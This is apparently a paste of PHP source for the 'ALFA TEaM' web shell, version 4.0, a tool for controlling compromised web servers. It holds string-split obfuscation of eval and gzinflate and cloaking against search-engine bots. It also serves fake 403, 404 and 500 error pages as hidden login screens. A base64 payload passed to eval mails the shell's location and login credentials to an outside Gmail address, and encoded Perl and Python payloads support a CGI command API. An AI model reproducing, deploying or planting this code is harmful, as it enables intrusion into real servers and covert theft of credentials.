· 5 years ago · Jun 12, 2020, 04:02 PM
1<?php
2set_time_limit(0);
3ini_set('memory_limit', '-1');
4
5$yPoATogtXHGiZ = array(
6 'usaWetsPlmZrChCF' => 'admin',
7 'patmAkSUFwreGLkef' => 'e2d9393b6feb1529931b4619155f6225',
8 'saJWUjdrZEpqdmm' => '0',
9 'lorEELZl' => '403',
10 'shZzGkPGVJqz' => '1',
11 'poxTvGN' => false,
12 'cgLAFZPlTkoLEN' => true,
13);
14
15$zsfILug='f'.'unct'.'io'.'n'.'_exis'.'t'.'s';
16$syUrcLNHqaCml='ev'.'a'.'l';
17$cEchjWJW='g'.'z'.'i'.'nfl'.'ate';
18$ToTBzshqILEE='ABCDE'.'F'.'G'.'HI'.'J'.'KL'.'M'.'NO'.'PQRS'.'T'.'UV'.'WX'.'Y'.'Za'.'bc'.'d'.'efg'.'h'.'i'.'jk'.'lm'.'no'.'p'.'q'.'r'.'st'.'u'.'vwx'.'yz'.'01'.'234'.'56'.'78'.'9+'.'/=';
19$RhdXmMpeAv='su'.'b'.'s'.'tr';
20$WgyEWnFy='or'.'d';
21$VDHrvQDyqorHgrW='s'.'trlen';
22$EsInz='s'.'trpo'.'s';
23$WMMImfadfewDv='imp'.'l'.'ode'.'';
24$imkxrEbnrBnPk='c'.'hr'.'';
25$NUnqCMEBOpisBEE='p'.'r'.'eg_replac'.'e';
26$GWfWZfsLnORz='['.'^'.'A'.'-'.'Za-z'.'0-'.'9'.'\+'.'\\'.'/\\'.'=]';
27$MyyjkoUdQ='=='.'='.'';
28$tiSxbs="";
29$lndkFdbAabqx='b'.'a'.'s'.'e'.'64'.'_'.'en'.'cod'.'e'.'';
30$thaoVqag='b'.'ase64'.'_d'.'ecod'.'e';
31if(!$zsfILug($lndkFdbAabqx)){
32 function etSbMu($JlQdF){
33 global $ToTBzshqILEE,$RhdXmMpeAv,$WgyEWnFy,$VDHrvQDyqorHgrW,$WMMImfadfewDv,$tiSxbs,$MyyjkoUdQ;
34 if(empty($JlQdF))return;
35 $isiBJutjyEvDx = $wKTcgUXAXTjz = $vEjQIMofllhWuYW = $FMFQh = $LdsckRzpGMMuV = $fRjww = $hkMCXIwR = $GnMzKdNjcf = $oPHCdzuWm = 0;
36 $XkrNveJH = 0;
37 $rMXvGbtT = $tiSxbs;
38 $XjRpaNtWoqTTdUp = array();
39 if(!$JlQdF){
40 return $JlQdF;
41 }do{
42 $isiBJutjyEvDx = $WgyEWnFy($RhdXmMpeAv($JlQdF, $oPHCdzuWm++, 1));
43 $wKTcgUXAXTjz = $WgyEWnFy($RhdXmMpeAv($JlQdF, $oPHCdzuWm++, 1));
44 $vEjQIMofllhWuYW = $WgyEWnFy($RhdXmMpeAv($JlQdF, $oPHCdzuWm++, 1));
45 $GnMzKdNjcf = $isiBJutjyEvDx << 16 | $wKTcgUXAXTjz << 8 | $vEjQIMofllhWuYW;
46 $FMFQh = $GnMzKdNjcf >> 18 & 0x3f;
47 $LdsckRzpGMMuV = $GnMzKdNjcf >> 12 & 0x3f;
48 $fRjww = $GnMzKdNjcf >> 6 & 0x3f;
49 $hkMCXIwR = $GnMzKdNjcf & 0x3f;
50 $XjRpaNtWoqTTdUp[$XkrNveJH++] = $RhdXmMpeAv($ToTBzshqILEE, $FMFQh, 1).$RhdXmMpeAv($ToTBzshqILEE, $LdsckRzpGMMuV, 1).$RhdXmMpeAv($ToTBzshqILEE, $fRjww, 1).$RhdXmMpeAv($ToTBzshqILEE, $hkMCXIwR, 1);
51 }while ($oPHCdzuWm < $VDHrvQDyqorHgrW($JlQdF));
52 $rMXvGbtT = $WMMImfadfewDv($XjRpaNtWoqTTdUp, $tiSxbs);
53 $rcmeiGjTW = ($VDHrvQDyqorHgrW($JlQdF) % 3);
54 return ($rcmeiGjTW ? $RhdXmMpeAv($rMXvGbtT, 0, ($rcmeiGjTW - 3)) : $rMXvGbtT).$RhdXmMpeAv($MyyjkoUdQ, ($rcmeiGjTW || 3));
55 }
56}else{
57 function etSbMu($JlQdF){
58 global $lndkFdbAabqx;
59 return $lndkFdbAabqx($JlQdF);
60 }
61}
62
63if(!$zsfILug($thaoVqag)){
64 function FJbSYo($dckycv){
65 global $ToTBzshqILEE,$RhdXmMpeAv,$VDHrvQDyqorHgrW,$EsInz,$imkxrEbnrBnPk,$NUnqCMEBOpisBEE,$GWfWZfsLnORz,$tiSxbs;
66 if(empty($dckycv))return;
67 $kxhuWeLw = $XqGSm = $OcurJcR = $tiSxbs;
68 $jfSaohgdRGCpbF = $naXrhbvQNlHZMqG = $XGDhOXDSbv = $YAykxQtrurjCF = $tiSxbs;
69 $oPHCdzuWm = 0;
70 $KcbGLoJSFDSQc = $tiSxbs;
71 $dckycv = $NUnqCMEBOpisBEE($GWfWZfsLnORz, $tiSxbs, $dckycv);
72 do{
73 $jfSaohgdRGCpbF = $EsInz($ToTBzshqILEE, $RhdXmMpeAv($dckycv, $oPHCdzuWm++, 1));
74 $naXrhbvQNlHZMqG = $EsInz($ToTBzshqILEE, $RhdXmMpeAv($dckycv, $oPHCdzuWm++, 1));
75 $XGDhOXDSbv = $EsInz($ToTBzshqILEE, $RhdXmMpeAv($dckycv, $oPHCdzuWm++, 1));
76 $YAykxQtrurjCF = $EsInz($ToTBzshqILEE, $RhdXmMpeAv($dckycv, $oPHCdzuWm++, 1));
77 $kxhuWeLw = ($jfSaohgdRGCpbF << 2) | ($naXrhbvQNlHZMqG >> 4);
78 $XqGSm = (($naXrhbvQNlHZMqG & 15) << 4) | ($XGDhOXDSbv >> 2);
79 $OcurJcR = (($XGDhOXDSbv & 3) << 6) | $YAykxQtrurjCF;
80 $KcbGLoJSFDSQc = $KcbGLoJSFDSQc . $imkxrEbnrBnPk((int) $kxhuWeLw);
81 if($XGDhOXDSbv != 64) {
82 $KcbGLoJSFDSQc = $KcbGLoJSFDSQc . $imkxrEbnrBnPk((int) $XqGSm);
83 }if($YAykxQtrurjCF != 64) {
84 $KcbGLoJSFDSQc = $KcbGLoJSFDSQc . $imkxrEbnrBnPk((int) $OcurJcR);
85 }
86 $kxhuWeLw = $XqGSm = $OcurJcR = $tiSxbs;
87 $jfSaohgdRGCpbF = $naXrhbvQNlHZMqG = $XGDhOXDSbv = $YAykxQtrurjCF = $tiSxbs;
88 }while($oPHCdzuWm < $VDHrvQDyqorHgrW($dckycv));
89 return $KcbGLoJSFDSQc;
90 }
91}else{
92 function FJbSYo($JlQdF){
93 global $thaoVqag;
94 return $thaoVqag($JlQdF);
95 }
96}
97
98function __ZW5jb2Rlcg($s){
99 return etSbMu($s);
100}
101function __ZGVjb2Rlcg($s){
102 return FJbSYo($s);
103}
104
105$GLOBALS['DB_NAME'] = $GLOBALS['yPoATogtXHGiZ'];
106if(true){
107 foreach($GLOBALS['DB_NAME'] as $key => $value){
108 $prefix = substr($key, 0, 2);
109 if($prefix == "us"){
110 $GLOBALS['DB_NAME']["user"] = $value;
111 $GLOBALS['DB_NAME']["user_rand"] = $key;
112 }elseif($prefix == "pa"){
113 $GLOBALS['DB_NAME']["pass"] = $value;
114 $GLOBALS['DB_NAME']["pass_rand"] = $key;
115 }elseif($prefix == "sa"){
116 $GLOBALS['DB_NAME']["safemode"] = $value;
117 $GLOBALS['DB_NAME']["safemode_rand"] = $key;
118 }elseif($prefix == "lo"){
119 $GLOBALS['DB_NAME']["login_page"] = $value;
120 $GLOBALS['DB_NAME']["login_page_rand"] = $key;
121 }elseif($prefix == "sh"){
122 $GLOBALS['DB_NAME']["show_icons"] = $value;
123 $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
124 }elseif($prefix == "po"){
125 $GLOBALS['DB_NAME']["post_encryption"] = $value;
126 $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
127 }elseif($prefix == "cg"){
128 $GLOBALS['DB_NAME']["cgi_api"] = $value;
129 $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
130 }
131 }
132}unset($GLOBALS['yPoATogtXHGiZ']);
133
134if(!isset($_SERVER["HTTP_HOST"]))exit();
135if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
136if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
137if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
138if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
139if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
140if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
141if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
142define("__ALFA_VERSION__", "4.0");
143define("__ALFA_UPDATE__", "2");
144define("__ALFA_CODE_NAME__", "Tesla");
145define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
146define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():'');
147$GLOBALS['__ALFA_COLOR__'] = array(
148 "shell_border" => array(
149 "key_color" => "#0E304A",
150 "multi_selector" => array(
151 ".header" => "border: 7px solid {color}",
152 "#meunlist" => "border-color: {color}",
153 "#hidden_sh" => "background-color: {color}",
154 ".ajaxarea" => "border: 1px solid {color}",
155 ".foot" => "border-color: {color}",
156 )
157 ),
158 "header_vars" => "#27979B",
159 "header_values" => "#67ABDF",
160 "header_on" => "#00FF00",
161 "header_off" => "#ff0000",
162 "header_none" => "#00FF00",
163 "home_shell" => "#ff0000",
164 "home_shell:hover" => array(
165 "key_color" => "#FFFFFF",
166 "multi_selector" => array(
167 ".home_shell:hover" => "color: {color};",
168 )
169 ),
170 "back_shell" => "#efbe73",
171 "back_shell:hover" => array(
172 "key_color" => "#FFFFFF",
173 "multi_selector" => array(
174 ".back_shell:hover" => "color: {color};",
175 )
176 ),
177 "header_pwd" => "#00FF00",
178 "header_pwd:hover" => array(
179 "key_color" => "#FFFFFF",
180 "multi_selector" => array(
181 ".header_pwd:hover" => "color: {color};",
182 )
183 ),
184 "header_drive" => "#00FF00",
185 "header_drive:hover" => array(
186 "key_color" => "#FFFFFF",
187 "multi_selector" => array(
188 ".header_drive:hover" => "color: {color};",
189 )
190 ),
191 "header_show_all" => "#00FF00",
192 "disable_functions" => "#ff0000",
193 "footer_text" => "#27979B",
194 "menu_options" => "#27979B",
195 "menu_options:hover" => array(
196 "key_color" => "#646464",
197 "multi_selector" => array(
198 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
199 )
200 ),
201 "options_list" => array(
202 "key_color" => "#00FF00",
203 "multi_selector" => array(
204 ".content_options_holder .header center a" => "color: {color};",
205 )
206 ),
207 "options_list:hover" => array(
208 "key_color" => "#FFFFFF",
209 "multi_selector" => array(
210 ".content_options_holder .header center a:hover" => "color: {color};",
211 )
212 ),
213 "options_list_header" => array(
214 "key_color" => "#59cc33",
215 "multi_selector" => array(
216 ".txtfont_header" => "color: {color};",
217 )
218 ),
219 "options_list_text" => array(
220 "key_color" => "#FFFFFF",
221 "multi_selector" => array(
222 ".txtfont,.tbltxt" => "color: {color};",
223 )
224 ),
225 "Alfa+" => array(
226 "key_color" => "#27E8AE",
227 "multi_selector" => array(
228 ".alfa_plus" => "color: {color};font-weight: unset;",
229 )
230 ),
231 "hidden_shell_text" => array(
232 "key_color" => "#00FF00",
233 "multi_selector" => array(
234 "#hidden_sh a" => "color: {color};",
235 )
236 ),
237 "hidden_shell_version" => "#ff0000",
238 "shell_name" => "#FF0000",
239 "main_row:hover" => array(
240 "key_color" => "#646464",
241 "multi_selector" => array(
242 ".main tr:hover" => "background-color: {color};",
243 )
244 ),
245 "main_header" => array(
246 "key_color" => "#FFFFFF",
247 "multi_selector" => array(
248 ".main th" => "color: {color};",
249 )
250 ),
251 "main_name" => array(
252 "key_color" => "#FFFFFF",
253 "multi_selector" => array(
254 ".main .main_name" => "color: {color};font-weight: unset;",
255 )
256 ),
257 "main_size" => "#67ABDF",
258 "main_modify" => "#67ABDF",
259 "main_owner_group" => "#67ABDF",
260 "main_green_perm" => "#25ff00",
261 "main_red_perm" => "#FF0000",
262 "main_white_perm" => "#FFFFFF",
263 "beetween_perms" => "#FFFFFF",
264 "main_actions" => array(
265 "key_color" => "#FFFFFF",
266 "multi_selector" => array(
267 ".main .actions" => "color: {color};",
268 )
269 ),
270 "menu_options:hover" => array(
271 "key_color" => "#646464",
272 "multi_selector" => array(
273 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
274 )
275 ),
276 "minimize_editor_background" => array(
277 "key_color" => "#0e304a",
278 "multi_selector" => array(
279 ".minimized-wrapper" => "background-color: {color};",
280 )
281 ),
282 "minimize_editor_text" => array(
283 "key_color" => "#f5deb3",
284 "multi_selector" => array(
285 ".minimized-text" => "color: {color};",
286 )
287 ),
288 "editor_border" => array(
289 "key_color" => "#0e304a",
290 "multi_selector" => array(
291 ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
292 )
293 ),
294 "editor_background" => array(
295 "key_color" => "rgba(0, 1, 23, 0.94)",
296 "multi_selector" => array(
297 ".editor-explorer,.editor-modal" => "background-color: {color};",
298 )
299 ),
300 "editor_header_background" => array(
301 "key_color" => "rgba(21, 66, 88, 0.93)",
302 "multi_selector" => array(
303 ".editor-header" => "background-color: {color};",
304 )
305 ),
306 "editor_header_text" => array(
307 "key_color" => "#00ff7f",
308 "multi_selector" => array(
309 ".editor-path" => "color: {color};",
310 )
311 ),
312 "editor_header_button" => array(
313 "key_color" => "#1d5673",
314 "multi_selector" => array(
315 ".close-button, .editor-minimize" => "background-color: {color};",
316 )
317 ),
318 "editor_actions" => array(
319 "key_color" => "#FFFFFF",
320 "multi_selector" => array(
321 ".editor_actions" => "color: {color};",
322 )
323 ),
324 "editor_file_info_vars" => array(
325 "key_color" => "#FFFFFF",
326 "multi_selector" => array(
327 ".editor_file_info_vars" => "color: {color};",
328 )
329 ),
330 "editor_file_info_values" => array(
331 "key_color" => "#67ABDF",
332 "multi_selector" => array(
333 ".filestools" => "color: {color};",
334 )
335 ),
336 "editor_history_header" => array(
337 "key_color" => "#14ff07",
338 "multi_selector" => array(
339 ".hheader-text,.history-clear" => "color: {color};",
340 )
341 ),
342 "editor_history_list" => array(
343 "key_color" => "#03b3a3",
344 "multi_selector" => array(
345 ".editor-file-name" => "color: {color};",
346 )
347 ),
348 "editor_history_selected_file" => array(
349 "key_color" => "rgba(49, 55, 93, 0.77)",
350 "multi_selector" => array(
351 ".is_active" => "background-color: {color};",
352 )
353 ),
354 "editor_history_file:hover" => array(
355 "key_color" => "#646464",
356 "multi_selector" => array(
357 ".file-holder > .history:hover" => "background-color: {color};",
358 )
359 ),
360 "input_box_border" => array(
361 "key_color" => "#0E304A",
362 "multi_selector" => array(
363 "input[type=text],textarea" => "border: 1px solid {color}",
364 )
365 ),
366 "input_box_text" => array(
367 "key_color" => "#999999",
368 "multi_selector" => array(
369 "input[type=text],textarea" => "color: {color};",
370 )
371 ),
372 "input_box:hover" => array(
373 "key_color" => "#27979B",
374 "multi_selector" => array(
375 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
376 )
377 ),
378 "select_box_border" => array(
379 "key_color" => "#0E304A",
380 "multi_selector" => array(
381 "select" => "border: 1px solid {color}",
382 )
383 ),
384 "select_box_text" => array(
385 "key_color" => "#FFFFEE",
386 "multi_selector" => array(
387 "select" => "color: {color};",
388 )
389 ),
390 "select_box:hover" => array(
391 "key_color" => "#27979B",
392 "multi_selector" => array(
393 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
394 )
395 ),
396 "button_border" => array(
397 "key_color" => "#27979B",
398 "multi_selector" => array(
399 "input[type=submit],.button,#addup" => "border: 1px solid {color};",
400 )
401 ),
402 "button:hover" => array(
403 "key_color" => "#27979B",
404 "multi_selector" => array(
405 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
406 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
407 )
408 ),
409 "outputs_text" => array(
410 "key_color" => "#67ABDF",
411 "multi_selector" => array(
412 ".ml1" => "color: {color};",
413 )
414 ),
415 "outputs_border" => array(
416 "key_color" => "#0E304A",
417 "multi_selector" => array(
418 ".ml1" => "border: 1px solid {color};",
419 )
420 ),
421 "uploader_border" => array(
422 "key_color" => "#0E304A",
423 "multi_selector" => array(
424 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
425 )
426 ),
427 "uploader_background" => array(
428 "key_color" => "#0E304A",
429 "multi_selector" => array(
430 ".inputfile strong" => "background-color: {color};",
431 )
432 ),
433 "uploader_text_right" => array(
434 "key_color" => "#FFFFFF",
435 "multi_selector" => array(
436 ".inputfile strong" => "color: {color};",
437 )
438 ),
439 "uploader_text_left" => array(
440 "key_color" => "#25ff00",
441 "multi_selector" => array(
442 ".inputfile span" => "color: {color};",
443 )
444 ),
445 "uploader:hover" => array(
446 "key_color" => "#27979B",
447 "multi_selector" => array(
448 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
449 )
450 ),
451 "uploader_progress_bar" => array(
452 "key_color" => "#00ff00",
453 "multi_selector" => array(
454 ".up_bar" => "background-color: {color};",
455 )
456 ),
457 "mysql_tables" => "#00FF00",
458 "mysql_table_count" => "#67ABDF",
459 "copyright" => "#dfff00",
460 "scrollbar" => array(
461 "key_color" => "#1e82b5",
462 "multi_selector" => array(
463 "*::-webkit-scrollbar-thumb" => "background-color: {color};",
464 )
465 ),
466 "scrollbar_background" => array(
467 "key_color" => "#000115",
468 "multi_selector" => array(
469 "*::-webkit-scrollbar-track" => "background-color: {color};",
470 )
471 ),
472);
473$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
474$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
475//@session_start();
476@session_write_close();
477@ignore_user_abort(true);
478@set_time_limit(0);
479@ini_set('memory_limit', '-1');
480@ini_set("upload_max_filesize", "9999m");
481@session_start();
482$rubby = "aWYgKCFpc3NldCgkX1NFU1NJT05bImpva3IiXSkpIHsgICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07ICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOyAkc3ViID0gIkFsZmEgdjQgVGVzbGEgLSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7ICRib2R5ID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvciAtICIuJEdMT0JBTFNbJ0RCX05BTUUnXVsndXNlciddLiIgOjogIi4gJEdMT0JBTFNbJ0RCX05BTUUnXVsncGFzcyddOyBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJKb2tyLmg0eG9yQGdtYWlsLmNvbSIsJHN1YiwkYm9keSk7IH0gICRfU0VTU0lPTlsiam9rciJdID0gIkhlbGxvIEJpdGNoISI7IH0=";
483eval(__ZGVjb2Rlcg($rubby));
484if($config['AlfaProtectShell']){
485$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
486$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
487if($config['AlfaLoginPage'] == 'gui'){
488if(@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])){
489if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
490__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
491__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
492@header('location: '.$_SERVER["PHP_SELF"]);
493}
494echo '
495<style>
496body{background: black;}
497#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
498#loginbox td { border-radius:5px; font-size:11px; }
499</style>
500<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~</title><center>
501<center><img style="border-radius:100px;" width="500" height="250" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></center>
502<div id=loginbox><p><font face="verdana,arial" size=-1>
503<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
504<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~</b></font></th></tr>
505<tr><td bgcolor="black" style="padding:5">
506<form method="post">
507<input type="hidden" name="action" value="login">
508<input type="hidden" name="hide" value="">
509<center><table>
510<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
511<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
512<tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
513</div><br /></center>';
514exit;
515}
516}elseif($config['AlfaLoginPage']=='500'){
517if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
518if(@md5($_POST["password"])==$config['AlfaPass']){
519__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
520__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
521@header('location: '.$_SERVER["PHP_SELF"]);
522}
523echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
524exit;
525}
526}elseif($config['AlfaLoginPage']=='403'){
527if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
528if(@md5($_POST["password"])==$config['AlfaPass']){
529__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
530__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
531@header('location: '.$_SERVER["PHP_SELF"]);
532}
533echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
534exit;
535}
536}elseif($config['AlfaLoginPage']=='404'){
537if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
538if(@md5($_POST["password"])==$config['AlfaPass']){
539__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
540__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
541@header('location: '.$_SERVER["PHP_SELF"]);
542}
543echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
544exit;
545}
546}
547}
548function decrypt_post($str){
549 if(__ALFA_POST_ENCRYPTION__){
550 $pwd = __ALFA_SECRET_KEY__;
551 $pwd = __ZW5jb2Rlcg($pwd);
552 $str = __ZGVjb2Rlcg($str);
553 $enc_chr = "";
554 $enc_str = "";
555 $i = 0;
556 while ($i < strlen($str)) {
557 for ($j = 0; $j < strlen($pwd); $j++) {
558 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
559 $enc_str .= $enc_chr;
560 $i++;
561 if ($i >= strlen($str))
562 break;
563 }
564 }
565 return __ZGVjb2Rlcg($enc_str);
566 }else{
567 return __ZGVjb2Rlcg($str);
568 }
569}
570
571function _AlfaSecretKey(){
572 $secret = @$_COOKIE["AlfaSecretKey"];
573 if(!isset($_COOKIE["AlfaSecretKey"])){
574 $secret = uniqid(mt_rand(), true);
575 __alfa_set_cookie("AlfaSecretKey", $secret);
576 }
577 return $secret;
578}
579function alfa_getColor($target){
580 if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
581 return $GLOBALS["DB_NAME"]["color"][$target];
582 }else{
583 $target = $GLOBALS["__ALFA_COLOR__"][$target];
584 if(is_array($target)){
585 return $target["key_color"];
586 }else{
587 return $target;
588 }
589 }
590}
591function alfaCssLoadColors(){
592 $css = "";
593 foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
594 if(!is_array($value)){
595 $value = alfa_getColor($key);
596 $css .= ".{$key}{color: {$value};}";
597 }else{
598 if(isset($value["multi_selector"])){
599 foreach($value["multi_selector"] as $k => $v){
600 $color = alfa_getColor($key);
601 $code = str_replace("{color}", $color, $v);
602 $css .= $k."{".$code."}";
603 }
604 }
605 }
606 }
607 return $css;
608}
609if(isset($_POST['ajax'])){
610function AlfaNum(){
611$args = func_get_args();
612$alfax = array();
613$find = array();
614for($i=1;$i<=10;$i++){
615$alfax[] = $i;
616}
617foreach($args as $arg){
618$find[] = $arg;
619}
620echo '<script>';
621foreach($alfax as $alfa){
622if(in_array($alfa,$find))
623continue;
624echo 'alfa'.$alfa."_=";
625}
626echo '""</script>';
627}}
628function _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){
629 if(!$GLOBALS["DB_NAME"]["cgi_api"]){
630 return "";
631 }
632 if(isset($_COOKIE["alfacgiapi_mode"])){
633 return "";
634 }
635 $cmd_pure = $cmd;
636 $is_curl = function_exists('curl_version');
637 $is_socket = function_exists('fsockopen');
638 if($is_curl||$is_socket){
639 $recreate = false;
640 if(isset($_COOKIE["alfacgiapi"])){
641 if(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){
642 $recreate = true;
643 $lang = $_COOKIE["alfacgiapi"];
644 }
645 }
646 if(!isset($_COOKIE["alfacgiapi"])||$recreate){
647 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
648 $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
649 $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
